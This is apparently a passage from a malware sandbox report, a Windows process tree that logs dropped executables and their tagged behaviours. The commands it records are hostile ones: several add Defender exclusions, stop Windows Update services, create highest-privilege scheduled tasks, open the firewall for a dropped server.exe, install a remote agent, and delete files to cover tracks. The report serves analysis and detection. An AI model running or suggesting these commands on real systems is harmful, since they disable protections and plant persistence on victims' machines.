C:\Users\Admin\AppData\Roaming\Office\svchost.exe"C:\Users\Admin\AppData\Roaming\Office\svchost.exe"66⤵
- Checks computer location settings
- Executes dropped EXE
PID:23452 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\D7uC9MI2WHAQ.bat" "67⤵PID:5944
-
C:\Windows\system32\chcp.comchcp 6500168⤵PID:6000
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost68⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6024
-
-
C:\Users\Admin\AppData\Roaming\Office\svchost.exe"C:\Users\Admin\AppData\Roaming\Office\svchost.exe"68⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:6404 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rCNGkfcM3lV6.bat" "69⤵PID:6588
-
C:\Windows\system32\chcp.comchcp 6500170⤵PID:6676
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost70⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6696
-
-
C:\Users\Admin\AppData\Roaming\Office\svchost.exe"C:\Users\Admin\AppData\Roaming\Office\svchost.exe"70⤵
- Checks computer location settings
PID:6848 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qwF7Dz75NJyA.bat" "71⤵PID:6964
-
C:\Windows\system32\chcp.comchcp 6500172⤵PID:7012
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost72⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7028
-
-
C:\Users\Admin\AppData\Roaming\Office\svchost.exe"C:\Users\Admin\AppData\Roaming\Office\svchost.exe"72⤵
- Checks computer location settings
PID:7464 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oGbcffw3GzOZ.bat" "73⤵PID:10248
-
C:\Windows\system32\chcp.comchcp 6500174⤵PID:10292
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost74⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:10304
-
-
C:\Users\Admin\AppData\Roaming\Office\svchost.exe"C:\Users\Admin\AppData\Roaming\Office\svchost.exe"74⤵
- Checks computer location settings
PID:10424 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KptY4m4YaAS3.bat" "75⤵PID:10504
-
C:\Windows\system32\chcp.comchcp 6500176⤵PID:10560
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost76⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:10580
-
-
C:\Users\Admin\AppData\Roaming\Office\svchost.exe"C:\Users\Admin\AppData\Roaming\Office\svchost.exe"76⤵
- Checks computer location settings
PID:10728 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\0ZpmQBW9Jh4V.bat" "77⤵PID:10820
-
C:\Windows\system32\chcp.comchcp 6500178⤵PID:10860
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost78⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:10880
-
-
C:\Users\Admin\AppData\Roaming\Office\svchost.exe"C:\Users\Admin\AppData\Roaming\Office\svchost.exe"78⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:11096 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oZHPHAbjnp1j.bat" "79⤵PID:11196
-
C:\Windows\system32\chcp.comchcp 6500180⤵PID:11252
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost80⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:11276
-
-
C:\Users\Admin\AppData\Roaming\Office\svchost.exe"C:\Users\Admin\AppData\Roaming\Office\svchost.exe"80⤵
- Checks computer location settings
PID:11380 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BM6VvjEaK35y.bat" "81⤵PID:11456
-
C:\Windows\system32\chcp.comchcp 6500182⤵PID:11508
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost82⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:11524
-
-
C:\Users\Admin\AppData\Roaming\Office\svchost.exe"C:\Users\Admin\AppData\Roaming\Office\svchost.exe"82⤵
- Checks computer location settings
PID:24600 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\aBHbXLTWa7cI.bat" "83⤵PID:24676
-
C:\Windows\system32\chcp.comchcp 6500184⤵PID:24728
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost84⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:24736
-
-
C:\Users\Admin\AppData\Roaming\Office\svchost.exe"C:\Users\Admin\AppData\Roaming\Office\svchost.exe"84⤵
- Checks computer location settings
PID:24876 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\0Of8lA3dSkH5.bat" "85⤵PID:24940
-
C:\Windows\system32\chcp.comchcp 6500186⤵PID:24996
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost86⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:25012
-
-
C:\Users\Admin\AppData\Roaming\Office\svchost.exe"C:\Users\Admin\AppData\Roaming\Office\svchost.exe"86⤵
- Checks computer location settings
PID:25160 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uuSDO7kn01Yf.bat" "87⤵PID:25248
-
C:\Windows\system32\chcp.comchcp 6500188⤵PID:25292
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost88⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:25308
-
-
C:\Users\Admin\AppData\Roaming\Office\svchost.exe"C:\Users\Admin\AppData\Roaming\Office\svchost.exe"88⤵
- Checks computer location settings
PID:26344 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\0vUGwewtfBc0.bat" "89⤵PID:26444
-
C:\Windows\system32\chcp.comchcp 6500190⤵PID:26532
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost90⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:26548
-
-
C:\Users\Admin\AppData\Roaming\Office\svchost.exe"C:\Users\Admin\AppData\Roaming\Office\svchost.exe"90⤵
- Checks computer location settings
PID:26652 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ugOsCTAgMf9i.bat" "91⤵PID:26724
-
C:\Windows\system32\chcp.comchcp 6500192⤵PID:26768
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost92⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:26784
-
-
C:\Users\Admin\AppData\Roaming\Office\svchost.exe"C:\Users\Admin\AppData\Roaming\Office\svchost.exe"92⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:27148 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Y7j30y9cAbxR.bat" "93⤵PID:27248
-
C:\Windows\system32\chcp.comchcp 6500194⤵PID:27300
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost94⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:27316
-
-
C:\Users\Admin\AppData\Roaming\Office\svchost.exe"C:\Users\Admin\AppData\Roaming\Office\svchost.exe"94⤵
- Checks computer location settings
PID:27444 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RXAh8OyIRAwa.bat" "95⤵PID:27524
-
C:\Windows\system32\chcp.comchcp 6500196⤵PID:27576
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost96⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:27592
-
-
C:\Users\Admin\AppData\Roaming\Office\svchost.exe"C:\Users\Admin\AppData\Roaming\Office\svchost.exe"96⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:11892 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FgNvDOKZC8vM.bat" "97⤵PID:12168
-
C:\Windows\system32\chcp.comchcp 6500198⤵PID:12212
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost98⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:12228
-
-
C:\Users\Admin\AppData\Roaming\Office\svchost.exe"C:\Users\Admin\AppData\Roaming\Office\svchost.exe"98⤵
- Checks computer location settings
PID:7720 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cXBWUGD5V4jh.bat" "99⤵PID:7792
-
C:\Windows\system32\chcp.comchcp 65001100⤵PID:7840
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost100⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7856
-
-
C:\Users\Admin\AppData\Roaming\Office\svchost.exe"C:\Users\Admin\AppData\Roaming\Office\svchost.exe"100⤵
- Checks computer location settings
PID:33328 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BC4uuYvlVqV0.bat" "101⤵PID:33416
-
C:\Windows\system32\chcp.comchcp 65001102⤵PID:33464
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost102⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:33484
-
-
C:\Users\Admin\AppData\Roaming\Office\svchost.exe"C:\Users\Admin\AppData\Roaming\Office\svchost.exe"102⤵
- Checks computer location settings
PID:34176 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Qw2RjR1OKrZT.bat" "103⤵PID:34424
-
C:\Windows\system32\chcp.comchcp 65001104⤵PID:34548
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost104⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:34608
-
-
C:\Users\Admin\AppData\Roaming\Office\svchost.exe"C:\Users\Admin\AppData\Roaming\Office\svchost.exe"104⤵
- Checks computer location settings
PID:35960 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1NbqDYjlxVSv.bat" "105⤵PID:36796
-
C:\Windows\system32\chcp.comchcp 65001106⤵PID:8224
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost106⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:8240
-
-
C:\Users\Admin\AppData\Roaming\Office\svchost.exe"C:\Users\Admin\AppData\Roaming\Office\svchost.exe"106⤵PID:13692
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YvzN9glXehyJ.bat" "107⤵PID:14056
-
C:\Windows\system32\chcp.comchcp 65001108⤵PID:14180
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost108⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:14236
-
-
C:\Users\Admin\AppData\Roaming\Office\svchost.exe"C:\Users\Admin\AppData\Roaming\Office\svchost.exe"108⤵PID:32536
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3WYDXrjkdD84.bat" "109⤵PID:31960
-
C:\Windows\system32\chcp.comchcp 65001110⤵PID:32064
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost110⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:32136
-
-
C:\Users\Admin\AppData\Roaming\Office\svchost.exe"C:\Users\Admin\AppData\Roaming\Office\svchost.exe"110⤵PID:19752
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\pi.exe"C:\Users\Admin\AppData\Local\Temp\Files\pi.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2356 -
C:\Windows\sysppvrdnvs.exeC:\Windows\sysppvrdnvs.exe4⤵
- Modifies security service
- Windows security bypass
- Checks computer location settings
- Executes dropped EXE
- Windows security modification
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3240 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:820 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4420
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait5⤵
- Suspicious use of WriteProcessMemory
PID:2216 -
C:\Windows\SysWOW64\sc.exesc stop UsoSvc6⤵
- Launches sc.exe
PID:4400
-
-
C:\Windows\SysWOW64\sc.exesc stop WaaSMedicSvc6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2992
-
-
C:\Windows\SysWOW64\sc.exesc stop wuauserv6⤵
- Launches sc.exe
PID:4372
-
-
C:\Windows\SysWOW64\sc.exesc stop DoSvc6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3320
-
-
C:\Windows\SysWOW64\sc.exesc stop BITS /wait6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4020
-
-
-
C:\Users\Admin\AppData\Local\Temp\99597542.exeC:\Users\Admin\AppData\Local\Temp\99597542.exe5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:17572 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f6⤵PID:17624
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f7⤵PID:17712
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"6⤵PID:17660
-
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"7⤵PID:17732
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1657131776.exeC:\Users\Admin\AppData\Local\Temp\1657131776.exe5⤵
- Executes dropped EXE
PID:18312
-
-
C:\Users\Admin\AppData\Local\Temp\390324013.exeC:\Users\Admin\AppData\Local\Temp\390324013.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:19044
-
-
C:\Users\Admin\AppData\Local\Temp\2126315482.exeC:\Users\Admin\AppData\Local\Temp\2126315482.exe5⤵
- Executes dropped EXE
PID:19480
-
-
C:\Users\Admin\AppData\Local\Temp\810028901.exeC:\Users\Admin\AppData\Local\Temp\810028901.exe5⤵PID:25068
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\s.exe"C:\Users\Admin\AppData\Local\Temp\Files\s.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:4920 -
C:\Windows\sysvplervcs.exeC:\Windows\sysvplervcs.exe4⤵
- Modifies security service
- Windows security bypass
- Checks computer location settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: SetClipboardViewer
- Suspicious use of WriteProcessMemory
PID:5096 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"5⤵
- Suspicious use of WriteProcessMemory
PID:4824 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1492
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2084 -
C:\Windows\SysWOW64\sc.exesc stop UsoSvc6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2272
-
-
C:\Windows\SysWOW64\sc.exesc stop WaaSMedicSvc6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2188
-
-
C:\Windows\SysWOW64\sc.exesc stop wuauserv6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:5068
-
-
C:\Windows\SysWOW64\sc.exesc stop DoSvc6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3476
-
-
C:\Windows\SysWOW64\sc.exesc stop BITS /wait6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4980
-
-
-
C:\Users\Admin\AppData\Local\Temp\816212898.exeC:\Users\Admin\AppData\Local\Temp\816212898.exe5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:17876 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f6⤵PID:17984
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f7⤵PID:18120
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"6⤵PID:18024
-
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"7⤵PID:18128
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\255224367.exeC:\Users\Admin\AppData\Local\Temp\255224367.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:18380
-
-
C:\Users\Admin\AppData\Local\Temp\1074232686.exeC:\Users\Admin\AppData\Local\Temp\1074232686.exe5⤵
- Executes dropped EXE
PID:19096
-
-
C:\Users\Admin\AppData\Local\Temp\3362324257.exeC:\Users\Admin\AppData\Local\Temp\3362324257.exe5⤵
- Executes dropped EXE
PID:19648
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Geek_se.exe"C:\Users\Admin\AppData\Local\Temp\Files\Geek_se.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:316
-
-
C:\Users\Admin\AppData\Local\Temp\Files\utility-inst.exe"C:\Users\Admin\AppData\Local\Temp\Files\utility-inst.exe"3⤵
- Executes dropped EXE
PID:39608 -
C:\Users\Admin\AppData\Local\Temp\is-6SO20.tmp\utility-inst.tmp"C:\Users\Admin\AppData\Local\Temp\is-6SO20.tmp\utility-inst.tmp" /SL5="$100268,922170,832512,C:\Users\Admin\AppData\Local\Temp\Files\utility-inst.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:40568 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-I4BCP.tmp\do.bat""5⤵
- System Location Discovery: System Language Discovery
PID:40732
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Solara_Protect.exe"C:\Users\Admin\AppData\Local\Temp\Files\Solara_Protect.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:40692 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows" /tr '"C:\Users\Admin\AppData\Local\Temp\Windows.exe"' & exit4⤵
- System Location Discovery: System Language Discovery
PID:40920 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Windows" /tr '"C:\Users\Admin\AppData\Local\Temp\Windows.exe"'5⤵
- Scheduled Task/Job: Scheduled Task
PID:8604
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp5D2E.tmp.bat""4⤵
- System Location Discovery: System Language Discovery
PID:40944 -
C:\Windows\SysWOW64\timeout.exetimeout 35⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:8592
-
-
C:\Users\Admin\AppData\Local\Temp\Windows.exe"C:\Users\Admin\AppData\Local\Temp\Windows.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:8632
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\stories.exe"C:\Users\Admin\AppData\Local\Temp\Files\stories.exe"3⤵
- Executes dropped EXE
PID:4044 -
C:\Users\Admin\AppData\Local\Temp\is-R2P98.tmp\stories.tmp"C:\Users\Admin\AppData\Local\Temp\is-R2P98.tmp\stories.tmp" /SL5="$A024A,5532893,721408,C:\Users\Admin\AppData\Local\Temp\Files\stories.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:15436 -
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" pause shine-encoder_111525⤵PID:15720
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 pause shine-encoder_111526⤵PID:15820
-
-
-
C:\Users\Admin\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe"C:\Users\Admin\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe" -i5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:15748
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\pothjadwtrgh.exe"C:\Users\Admin\AppData\Local\Temp\Files\pothjadwtrgh.exe"3⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:6136 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 12284⤵
- Program crash
PID:7104
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Reaper%20cfx%20Spoofer%20V2.exe"C:\Users\Admin\AppData\Local\Temp\Files\Reaper%20cfx%20Spoofer%20V2.exe"3⤵
- Adds Run key to start application
PID:2472 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\cfx.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\cfx.exe4⤵
- Modifies registry class
PID:23556 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls5⤵PID:23608
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls5⤵PID:24204
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Pause5⤵PID:24224
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Installeraus.exe"C:\Users\Admin\AppData\Local\Temp\Files\Installeraus.exe"3⤵
- System Location Discovery: System Language Discovery
PID:23712 -
C:\Users\Admin\AppData\Roaming\MSIX\meshagent32-group.exe"C:\Users\Admin\AppData\Roaming\MSIX\meshagent32-group.exe" -fullinstall4⤵
- Sets service image path in registry
- Drops file in Program Files directory
PID:23784
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\dayum.exe"C:\Users\Admin\AppData\Local\Temp\Files\dayum.exe"3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:23764 -
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"4⤵
- Drops startup file
- Adds Run key to start application
PID:6504 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:10172
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe"C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe"3⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:23972 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- System Location Discovery: System Language Discovery
PID:24052
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"3⤵
- Checks computer location settings
- Drops startup file
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:24140 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:6264
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:6624
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:9300
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:9472
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:9924
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\build_2024-07-25_20-56.exe"C:\Users\Admin\AppData\Local\Temp\Files\build_2024-07-25_20-56.exe"3⤵
- Checks computer location settings
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:24260 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Files\build_2024-07-25_20-56.exe" & rd /s /q "C:\ProgramData\JDGIIDHJEBGI" & exit4⤵PID:7364
-
C:\Windows\SysWOW64\timeout.exetimeout /t 105⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:7444
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 24260 -s 18604⤵
- Program crash
PID:7420
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ovrflw.exe"C:\Users\Admin\AppData\Local\Temp\Files\ovrflw.exe"3⤵
- Checks computer location settings
- Adds Run key to start application
PID:24416 -
C:\Users\Admin\AppData\Roaming\Microsoft Network Agent\mswabnet.exe"C:\Users\Admin\AppData\Roaming\Microsoft Network Agent\mswabnet.exe"4⤵PID:24528
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\dtl.exe"C:\Users\Admin\AppData\Local\Temp\Files\dtl.exe"3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:25436 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 25436 -s 15124⤵
- Program crash
PID:26604
-
-
-
